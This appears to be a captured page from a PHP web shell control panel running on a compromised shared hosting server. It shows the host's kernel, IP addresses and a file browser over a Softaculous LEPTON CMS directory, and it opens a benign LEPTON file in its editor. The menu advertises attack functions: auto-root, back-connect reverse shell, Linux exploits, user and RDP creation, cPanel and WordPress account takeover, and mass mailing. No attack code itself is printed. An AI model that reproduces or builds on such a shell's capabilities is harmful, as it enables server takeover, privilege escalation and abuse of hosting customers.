Linux server220.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
: 198.54.116.164 | : 216.73.216.179
Cant Read [ /etc/named.conf ]
7.4.33
adnangch
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
lepton /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
165
B
-rw-r--r--
.htpasswd
103
B
-rw-r--r--
cj_example.php
1.16
KB
-rw-r--r--
clone.php
7.54
KB
-rw-r--r--
config.php
528
B
-rw-r--r--
cronjob.ini.php
870
B
-rw-r--r--
edit.php
4.65
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
10.7
KB
-rw-r--r--
fileindex.php
104
B
-rw-r--r--
hello-world.php
149
B
-rw-r--r--
import.php
3.69
KB
-rw-r--r--
index.php
584
B
-rw-r--r--
info.xml
2.02
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
8.3
KB
-rw-r--r--
install.xml
1.44
KB
-rw-r--r--
lepton.ini.php
1.46
KB
-rw-r--r--
lepton.sql
52.13
KB
-rw-r--r--
lepton.zip
10.54
MB
-rw-r--r--
md5
1.45
KB
-rw-r--r--
notes.txt
770
B
-rw-r--r--
root_.htaccess
366
B
-rw-r--r--
update_pass.php
649
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cj_example.php
<?php /** * This file is part of LEPTON Core, released under the GNU GPL * Please see LICENSE and COPYING files in your package for details, specially for terms and warranties. * * NOTICE:LEPTON CMS Package has several different licenses. * Please see the individual license in the header of each single file or info.php of modules and templates. * * @author LEPTON Project * @copyright 2010-2025 LEPTON Project * @link https://lepton-cms.org * @license https://gnu.org/licenses/gpl-3.0.html * @license_terms please see LICENSE and COPYING files in your package * */ // include secure.php to protect this file and the whole CMS! if(!defined("SEC_FILE")){define("SEC_FILE",'/framework/secure.php' );} if (defined('LEPTON_PATH')) { include LEPTON_PATH.SEC_FILE; } else { $oneback = "../"; $root = $oneback; $level = 1; while (($level < 10) && (!file_exists($root.SEC_FILE))) { $root .= $oneback; $level += 1; } if (file_exists($root.SEC_FILE)) { include $root.SEC_FILE; } else { trigger_error(sprintf("[ <b>%s</b> ] Can't include secure.php!", $_SERVER['SCRIPT_NAME']), E_USER_ERROR); } } // end include secure file
Close